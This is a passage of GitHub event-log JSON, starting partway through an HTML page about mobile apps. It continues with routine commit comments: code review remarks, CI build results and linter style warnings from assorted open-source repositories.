APP是英文Application的简称，是指智能手机的第三方应用程序，统称“移动应用”，也称“手机客户端”。目前被大家所熟知的著名企业的app有“微信”，“QVOD播放器”，以及“愤怒的小鸟”，“水果忍者”等等。相信大家的手机里或多或少都会有几个app应用程序。   介绍完什么是手机app,接下来就说说app的分类，哪几类app最受欢迎呢？目前市场上的app种类多种多样，包括通讯类、游戏类、娱乐类、社交类、实用生活类等等。其中游戏类是目前市场上最后欢迎、下载量最高的手机app应用，其次是社交类APP，大家所熟知的社交类的app有微信、陌陌等。排在第三的娱乐类的app，她又可分为几类：歌曲类、播放器类等。QVOD播放器和酷狗就是最类型app的人气之作。    随着时代与技术的进步，人们对于信息的需求也就越大，对于移动性的要求也就越高。所以，手机app的快速发展是必然的发展趋势，同时应运而生的还有很多app商店，这就大大提高了app的下载量，让app的下载成为了一件非常简单的事情。\r\n\t\t\t\t</p>\r\n\t\t\t</div>\r\n\t\t\t<div class=\"newshare\">\r\n\t\t\t\t<p>分享到：</p>\r\n\t\t\t\t<a href=\"javascript:;\" title=\"分享到空间\" class=\"newicon1\"></a>\r\n\t\t\t\t<a href=\"javascript:;\" title=\"分享到微博\" class=\"newicon2\"></a>\r\n\t\t\t\t<a href=\"javascript:;\" title=\"分享到星星\" class=\"newicon3\"></a>\r\n\t\t\t\t<a href=\"javascript:;\" title=\"分享到博客\" class=\"newicon4\"></a>\r\n\t\t\t\t<a href=\"javascript:;\" title=\"分享到微信\" class=\"newicon5\"></a>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t</div>\r\n\t<div class=\"clear\"></div>\r\n\t<div class=\"newend\">\r\n\t\t<div class=\"endleft\">\r\n\t\t\t<dl>\r\n\t\t\t\t<dt><img src=\"images/new3.jpg\" alt=\"图片\"  width=\"100%\" /></dt>\r\n\t\t\t\t\r\n\t\t\t\t<dd><p>智慧企业是能够为企业提供在手机、PC及WEB页面基于企业通信录的信息汇聚、协同办公、电话会议、融合通信、资源分享、项目管理、手机邮箱等功能的企业信息化协作平台。</p></dd>\r\n\t\t\t</dl>\r\n\t\t\t<div class=\"clear\"></div>\r\n\t\t\t<dl>\r\n\t\t\t\t<dt><img src=\"images/new2.jpg\" alt=\"图片\"  width=\"100%\" /></dt>\r\n\t\t\t\t\r\n\t\t\t\t<dd><p>智慧企业是能够为企业提供在手机、PC及WEB页面基于企业通信录的信息汇聚、协同办公、电话会议、融合通信、资源分享、项目管理、手机邮箱等功能的企业信息化协作平台。</p></dd>\r\n\t\t\t</dl>\r\n\t\t</div>\r\n\t\t<div class=\"endright\">\r\n\t\t\t<dl>\r\n\t\t\t\t<dt><img src=\"images/new4.jpg\" alt=\"图片\"  width=\"100%\" /></dt>\r\n\t\t\t\t\r\n\t\t\t\t<dd><p>智慧企业是能够为企业提供在手机、PC及WEB页面基于企业通信录的信息汇聚、协同办公、电话会议、融合通信、资源分享、项目管理、手机邮箱等功能的企业信息化协作平台。</p></dd>\r\n\t\t\t</dl>\r\n\t\t\t<div class=\"clear\"></div>\r\n\t\t\t<dl>\r\n\t\t\t\t<dt><img src=\"images/new5.jpg\" alt=\"图片\"  width=\"100%\" /></dt>\r\n\t\t\t\t\r\n\t\t\t\t<dd><p>智慧企业是能够为企业提供在手机、PC及WEB页面基于企业通信录的信息汇聚、协同办公、电话会议、融合通信、资源分享、项目管理、手机邮箱等功能的企业信息化协作平台。</p></dd>\r\n\t\t\t</dl>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<div class=\"clear\"></div>\r\n<div class=\"floot\">\r\n\t<div class=\"flootbox\">\r\n\t\t<div class=\"flooter\">\r\n\t\t\t<div class=\"link\">\r\n\t\t\t<h3>友情链接</h3>\r\n\t\t\t<a href=\"#\">个人主页</a><a href=\"#\">阿里云</a><a href=\"#\">潭州学院</a>\r\n\t\t</div>\r\n\t\t<div class=\"copyright\">Copyright ©2016 dear丶主角 </div>\r\n\t\t</div>\r\n\t</div>\r\n\r\n</div>\r\n</body>\r\n</html>\r\n"}},"created_at":"2016-09-22T09:56:02Z"}
{"id":"4601463745","type":"CommitCommentEvent","actor":{"login":"raryosu"},"repo":{"name":"homomaid/homomaid.github.io"},"payload":{"comment":{"id":19127556,"position":95,"line":95,"path":"index.html","commit_id":"23ad70b60f1d70b44dd23036da33c0e1fc5d353a","created_at":"2016-09-22T09:56:25Z","updated_at":"2016-09-22T09:56:25Z","body":"`<div class=\"row center-block\">` では？"}},"created_at":"2016-09-22T09:56:25Z"}
{"id":"4601464190","type":"CommitCommentEvent","actor":{"login":"raryosu"},"repo":{"name":"homomaid/homomaid.github.io"},"payload":{"comment":{"id":19127557,"position":96,"line":96,"path":"index.html","commit_id":"23ad70b60f1d70b44dd23036da33c0e1fc5d353a","created_at":"2016-09-22T09:56:31Z","updated_at":"2016-09-22T09:56:31Z","body":"道場"}},"created_at":"2016-09-22T09:56:31Z"}
{"id":"4601466687","type":"CommitCommentEvent","actor":{"login":"raryosu"},"repo":{"name":"homomaid/homomaid.github.io"},"payload":{"comment":{"id":19127562,"position":132,"line":132,"path":"index.html","commit_id":"23ad70b60f1d70b44dd23036da33c0e1fc5d353a","created_at":"2016-09-22T09:57:01Z","updated_at":"2016-09-22T09:57:01Z","body":"`<div ...>` では？"}},"created_at":"2016-09-22T09:57:01Z"}
{"id":"4601467569","type":"CommitCommentEvent","actor":{"login":"aradjdi"},"repo":{"name":"angular/angular-fr"},"payload":{"comment":{"id":19127564,"position":null,"line":null,"path":null,"commit_id":"4a3250cf27f8ebfd3e39bbbf59f77db1548402fa","created_at":"2016-09-22T09:57:12Z","updated_at":"2016-09-22T09:57:12Z","body":"I don't know.\r\nDo I have to keep it ?"}},"created_at":"2016-09-22T09:57:12Z"}
{"id":"4601470590","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127567,"position":null,"line":null,"path":null,"commit_id":"dd924cff1fa011610f1f09e526cd02222b92cd62","created_at":"2016-09-22T09:57:51Z","updated_at":"2016-09-22T09:57:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1103](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13881&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 243, ignored: 3 Build time: 00:11:05\n### Failed tests\n```\nAPIFunTests.test adding filters to a package: <no details avaliable>\n\nAPIFunTests.test re-adding filters to a package: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T09:57:51Z"}
{"id":"4601471525","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19127571,"position":null,"line":null,"path":null,"commit_id":"63ebf19b6e5bbea0ebdfd1adafc6952d3950bf46","created_at":"2016-09-22T09:58:04Z","updated_at":"2016-09-22T09:58:04Z","body":"Great idea! Good luck."}},"created_at":"2016-09-22T09:58:04Z"}
{"id":"4601472865","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127572,"position":null,"line":null,"path":null,"commit_id":"cae009f51d0f9329fbab73d1572141e4837e62b2","created_at":"2016-09-22T09:58:20Z","updated_at":"2016-09-22T09:58:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1105](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13889&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:58:20Z"}
{"id":"4601477566","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127578,"position":63,"line":631,"path":"cura/Settings/MachineManager.py","commit_id":"90dedc354c4e295e11e1826ff59d988067f2924e","created_at":"2016-09-22T09:59:07Z","updated_at":"2016-09-22T09:59:07Z","body":"Why use the generator if 2 lines up there already is a list with the exact same info (already aptly called \"stacks\") "}},"created_at":"2016-09-22T09:59:07Z"}
{"id":"4601479360","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127580,"position":86,"line":86,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:59:28Z","updated_at":"2016-09-22T09:59:28Z","body":"Each element in the `nodes` section ~~identify~~ *identifies* a process on a specific host,.\r\nThe element identifier is generated by concatenating the hostname and the PID with `;` as the delimiter (e.g. `example.org;29770`)."}},"created_at":"2016-09-22T09:59:28Z"}
{"id":"4605819181","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"robertogagliotta/openemr"},"payload":{"comment":{"id":19138826,"position":null,"line":null,"path":null,"commit_id":"f239c9e8bf746e8fc3e98cca76d545919b066ce6","created_at":"2016-09-23T00:00:04Z","updated_at":"2016-09-23T00:00:04Z","body":"Code looks very good and thanks for testing it. I brought it into the codebase.\r\nthanks!\r\n-brady"}},"created_at":"2016-09-23T00:00:04Z"}
{"id":"4605819961","type":"CommitCommentEvent","actor":{"login":"leonardocintra"},"repo":{"name":"leonardocintra/python-pagseguro"},"payload":{"comment":{"id":19138833,"position":null,"line":null,"path":null,"commit_id":"c77ed71c1888988243e542dd82c20583bb717b47","created_at":"2016-09-23T00:00:15Z","updated_at":"2016-09-23T00:00:15Z","body":"esta quebrando...\r\n![image](https://cloud.githubusercontent.com/assets/5832193/18769910/8cf75de4-8107-11e6-87cb-4b81610741e3.png)\r\n"}},"created_at":"2016-09-23T00:00:15Z"}
{"id":"4605822235","type":"CommitCommentEvent","actor":{"login":"hamid-hoseini"},"repo":{"name":"hamid-hoseini/CSS-CodeSamples"},"payload":{"comment":{"id":19138841,"position":null,"line":null,"path":null,"commit_id":"1134548af03ad49e7f221f7bd0fe0aa4ea855606","created_at":"2016-09-23T00:00:53Z","updated_at":"2016-09-23T00:00:53Z","body":"CSS code samples"}},"created_at":"2016-09-23T00:00:53Z"}
{"id":"4605825453","type":"CommitCommentEvent","actor":{"login":"tianheyu927"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19138843,"position":45,"line":41,"path":"python/gps/algorithm/cost/cost_state.py","commit_id":"771e72c91e423aafa99f0757dabf47e8155ddb1b","created_at":"2016-09-23T00:01:50Z","updated_at":"2016-09-23T00:01:50Z","body":"What's A here? It's not defined and caused errors when I tried to run pointmass."}},"created_at":"2016-09-23T00:01:50Z"}
{"id":"4605842358","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19138874,"position":null,"line":null,"path":null,"commit_id":"d72b6a15846c3e7deb23513a61856baf4ca90a51","created_at":"2016-09-23T00:07:03Z","updated_at":"2016-09-23T00:07:03Z","body":"[R/convert_to_taxa_table.R:52:71:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​  ncbi_taxa_filepath <- system.file(\"extdata/taxonomy.tsv.gz\", package=\"MetaComp\")\n                                                                     ~^~\n```\n[R/convert_to_taxa_table.R:57:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L57) *style:* **lines should not be more than 100 characters.**\n```r\n​  data <- base::as.data.frame(data.table::fread(base::sprintf('gunzip -c %s', ncbi_taxa_filepath), header=T))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:57:106:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​  data <- base::as.data.frame(data.table::fread(base::sprintf('gunzip -c %s', ncbi_taxa_filepath), header=T))\n                                                                                                        ~^~\n```\n[R/convert_to_taxa_table.R:102:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L102) *style:* **lines should not be more than 100 characters.**\n```r\n​        # get parent_taxID and loop through until parent_taxID doesnt equal to 131567 (highest classification)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:116:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L116) *style:* **lines should not be more than 100 characters.**\n```r\n​  base::colnames(taxa_table) <- c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:117:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L117) *style:* **lines should not be more than 100 characters.**\n```r\n​  base::subset(taxa_table, select=c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:117:34:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/R/convert_to_taxa_table.R#L117) *style:* **Put spaces around all infix operators.**\n```r\n​  base::subset(taxa_table, select=c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\"))\n                                ~^~\n```\n[tests/testthat/test_convert_to_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/tests/testthat/test_convert_to_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_to_otu_table.R:26:1:](https://github.com/seninp-bioinfo/MetaComp/blob/d72b6a15846c3e7deb23513a61856baf4ca90a51/tests/testthat/test_convert_to_otu_table.R#L26) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_to_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-23T00:07:03Z"}
{"id":"4605843877","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19138879,"position":null,"line":null,"path":null,"commit_id":"1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d","created_at":"2016-09-23T00:07:31Z","updated_at":"2016-09-23T00:07:31Z","body":"[R/convert_to_taxa_table.R:52:71:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​  ncbi_taxa_filepath <- system.file(\"extdata/taxonomy.tsv.gz\", package=\"MetaComp\")\n                                                                     ~^~\n```\n[R/convert_to_taxa_table.R:57:1:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L57) *style:* **lines should not be more than 100 characters.**\n```r\n​  data <- base::as.data.frame(data.table::fread(base::sprintf('gunzip -c %s', ncbi_taxa_filepath), header=T))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:57:106:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​  data <- base::as.data.frame(data.table::fread(base::sprintf('gunzip -c %s', ncbi_taxa_filepath), header=T))\n                                                                                                        ~^~\n```\n[R/convert_to_taxa_table.R:102:1:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L102) *style:* **lines should not be more than 100 characters.**\n```r\n​        # get parent_taxID and loop through until parent_taxID doesnt equal to 131567 (highest classification)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:116:1:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L116) *style:* **lines should not be more than 100 characters.**\n```r\n​  base::colnames(taxa_table) <- c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:117:1:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L117) *style:* **lines should not be more than 100 characters.**\n```r\n​  base::subset(taxa_table, select=c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/convert_to_taxa_table.R:117:34:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/R/convert_to_taxa_table.R#L117) *style:* **Put spaces around all infix operators.**\n```r\n​  base::subset(taxa_table, select=c(\"Domain\", \"Phylum\", \"Class\", \"Order\", \"Family\", \"Genus\", \"Species\"))\n                                ~^~\n```\n[tests/testthat/test_convert_to_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/tests/testthat/test_convert_to_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_to_otu_table.R:26:1:](https://github.com/seninp-bioinfo/MetaComp/blob/1ec4b5d887eaddcf19af5ce77d8158f12c7ba95d/tests/testthat/test_convert_to_otu_table.R#L26) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_to_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-23T00:07:31Z"}
{"id":"4605845027","type":"CommitCommentEvent","actor":{"login":"mschuchard"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19138880,"position":null,"line":null,"path":null,"commit_id":"7070ee06f59cfdbbd5e03f75d8a57a54c2e39a42","created_at":"2016-09-23T00:07:55Z","updated_at":"2016-09-23T00:07:55Z","body":"So it is a speedup for package loading during Atom loading. Sounds cool."}},"created_at":"2016-09-23T00:07:55Z"}
{"id":"4605847647","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19138892,"position":45,"line":41,"path":"python/gps/algorithm/cost/cost_state.py","commit_id":"771e72c91e423aafa99f0757dabf47e8155ddb1b","created_at":"2016-09-23T00:08:44Z","updated_at":"2016-09-23T00:08:44Z","body":"Hmm, I'm not sure. You can revert the changes in cost state from this\ncommit.\n\nOn Thu, Sep 22, 2016 at 5:01 PM, Tianhe Yu <notifications@github.com> wrote:\n\n> What's A here? It's not defined and caused errors when I tried to run\n> pointmass.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tianheyu927/gps/commit/771e72c91e423aafa99f0757dabf47e8155ddb1b#commitcomment-19138843>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABMlATrhG0430-vDTGqkQmsPOP9l08oCks5qsxbugaJpZM4KEe81>\n> .\n>\n"}},"created_at":"2016-09-23T00:08:44Z"}
{"id":"4605855957","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19138910,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-23T00:11:15Z","updated_at":"2016-09-23T00:11:15Z","body":"looks like master is having some problems too: https://github.com/xbmc/xbmc/pull/10396#issuecomment-249037989"}},"created_at":"2016-09-23T00:11:15Z"}
{"id":"4605856613","type":"CommitCommentEvent","actor":{"login":"mschuchard"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19138911,"position":null,"line":null,"path":null,"commit_id":"f7e716cb1d37df343f6460dc2a849d729f980985","created_at":"2016-09-23T00:11:27Z","updated_at":"2016-09-23T00:11:27Z","body":"What version of Atom Linter added this to the API? I don't see it in the release notes. What does it indicate?"}},"created_at":"2016-09-23T00:11:27Z"}
{"id":"4605859925","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"anka976/mugloar"},"payload":{"comment":{"id":19138922,"position":null,"line":null,"path":null,"commit_id":"63f06fbb18d9f744d86469191e8daaca791c5302","created_at":"2016-09-23T00:12:24Z","updated_at":"2016-09-23T00:12:24Z","body":"Good start.\r\nYou may check for the game solution here: https://github.com/javadev/undescriptive-project"}},"created_at":"2016-09-23T00:12:24Z"}
{"id":"4605860613","type":"CommitCommentEvent","actor":{"login":"offbit"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19138924,"position":null,"line":null,"path":null,"commit_id":"4ba8c8d78bf1bbdfc595bf547bad30580cb4c20b","created_at":"2016-09-23T00:12:37Z","updated_at":"2016-09-23T00:12:37Z","body":"Hi, \r\nI think this is the correct combination:\r\nfilter_size[1] = 1\r\nstrides = [1, strides[1], 1, 1]\r\nfilter was previously correct, stride wasn't working as intended. "}},"created_at":"2016-09-23T00:12:37Z"}
{"id":"4605861033","type":"CommitCommentEvent","actor":{"login":"dgreen899"},"repo":{"name":"dgreen899/PokemonCharacters"},"payload":{"comment":{"id":19138925,"position":null,"line":null,"path":null,"commit_id":"d371db9e05a10625968f273959069f07742a85b4","created_at":"2016-09-23T00:12:48Z","updated_at":"2016-09-23T00:12:48Z","body":"this is good"}},"created_at":"2016-09-23T00:12:48Z"}
{"id":"4605864504","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138934,"position":null,"line":null,"path":null,"commit_id":"9f7073c21162fe6ff1ffd1d0964bb8f613806638","created_at":"2016-09-23T00:13:59Z","updated_at":"2016-09-23T00:13:59Z","body":"cc @bradleyrichter for his thoughts.\r\nI think most people clearing this data has no idea abut webRTC device IDs and just want to unbreak a non working site."}},"created_at":"2016-09-23T00:13:59Z"}
{"id":"4605870234","type":"CommitCommentEvent","actor":{"login":"lungtent"},"repo":{"name":"lungtent/Lab-1-Mobile-Device"},"payload":{"comment":{"id":19138950,"position":null,"line":null,"path":null,"commit_id":"4904d174bab318cb03963d08c56890a969c9e2bb","created_at":"2016-09-23T00:15:48Z","updated_at":"2016-09-23T00:15:48Z","body":"my first comment\r\n"}},"created_at":"2016-09-23T00:15:48Z"}
{"id":"4605872594","type":"CommitCommentEvent","actor":{"login":"chenyiping1995"},"repo":{"name":"PioneeringBronyUnion/pbu-mlp-eqg4-album"},"payload":{"comment":{"id":19138960,"position":null,"line":null,"path":null,"commit_id":"69be45985fcc48d328c9d4388bf4315acc4dd4f8","created_at":"2016-09-23T00:16:33Z","updated_at":"2016-09-23T00:16:33Z","body":"@Leafybat 32行和85行建议再润色。"}},"created_at":"2016-09-23T00:16:33Z"}
{"id":"4605880189","type":"CommitCommentEvent","actor":{"login":"markhalonen"},"repo":{"name":"relinc/SurePulseDataProcessor"},"payload":{"comment":{"id":19138977,"position":null,"line":null,"path":null,"commit_id":"e8d17babeb582d75e916600b4a58fe1d8199ab68","created_at":"2016-09-23T00:19:09Z","updated_at":"2016-09-23T00:19:09Z","body":"Closes #12"}},"created_at":"2016-09-23T00:19:09Z"}
{"id":"4605880856","type":"CommitCommentEvent","actor":{"login":"TheLastProject"},"repo":{"name":"AsteroidOS/supported-languages"},"payload":{"comment":{"id":19138979,"position":null,"line":null,"path":null,"commit_id":"a2320b655c20665afb1a5b229c78739065c5d407","created_at":"2016-09-23T00:19:20Z","updated_at":"2016-09-23T00:19:20Z","body":"LocaleCode is wrong here"}},"created_at":"2016-09-23T00:19:20Z"}
{"id":"4605885576","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138989,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-23T00:20:52Z","updated_at":"2016-09-23T00:20:52Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1771 of 1771 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T00:20:52Z"}
{"id":"4605888021","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19138996,"position":null,"line":null,"path":null,"commit_id":"f85b91b0daca61bf5ee07214776853eb0591a95a","created_at":"2016-09-23T00:21:45Z","updated_at":"2016-09-23T00:21:45Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f85b91b0daca61bf5ee07214776853eb0591a95a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T00:21:45Z"}
{"id":"4605892651","type":"CommitCommentEvent","actor":{"login":"AlvinRamoutar"},"repo":{"name":"AlvinRamoutar/some-next-RTS"},"payload":{"comment":{"id":19139012,"position":null,"line":null,"path":null,"commit_id":"bf1d2f8cd7f9d38baa44626a6f61983ed8fddc04","created_at":"2016-09-23T00:23:12Z","updated_at":"2016-09-23T00:23:12Z","body":"- renamed urlString to helpURL\r\n- moved helpURL to GV\r\n- renamed openWebpage to openHelpPage\r\n- indented\r\n\r\nThanks for finishing that!"}},"created_at":"2016-09-23T00:23:12Z"}
{"id":"4605894833","type":"CommitCommentEvent","actor":{"login":"yrsegal"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19139031,"position":7,"line":19,"path":"src/main/java/vazkii/botania/common/network/PacketHandler.java","commit_id":"61edcc43f0ca54752b602ef0cb52a1b06fa5d42b","created_at":"2016-09-23T00:23:58Z","updated_at":"2016-09-23T00:23:58Z","body":"*angrily stares at missing space*"}},"created_at":"2016-09-23T00:23:58Z"}
{"id":"4605895171","type":"CommitCommentEvent","actor":{"login":"SlySven"},"repo":{"name":"Mudlet/Mudlet"},"payload":{"comment":{"id":19139033,"position":null,"line":null,"path":null,"commit_id":"aed349463eadf61b293133fe603bbd6b686c01a4","created_at":"2016-09-23T00:24:06Z","updated_at":"2016-09-23T00:24:06Z","body":"Um, how did this commit get into the development branch - I can't see a Pull Request, it just seems to have appeared in the history at: 2016-08-29 10:47:43 ? :confounded:"}},"created_at":"2016-09-23T00:24:06Z"}
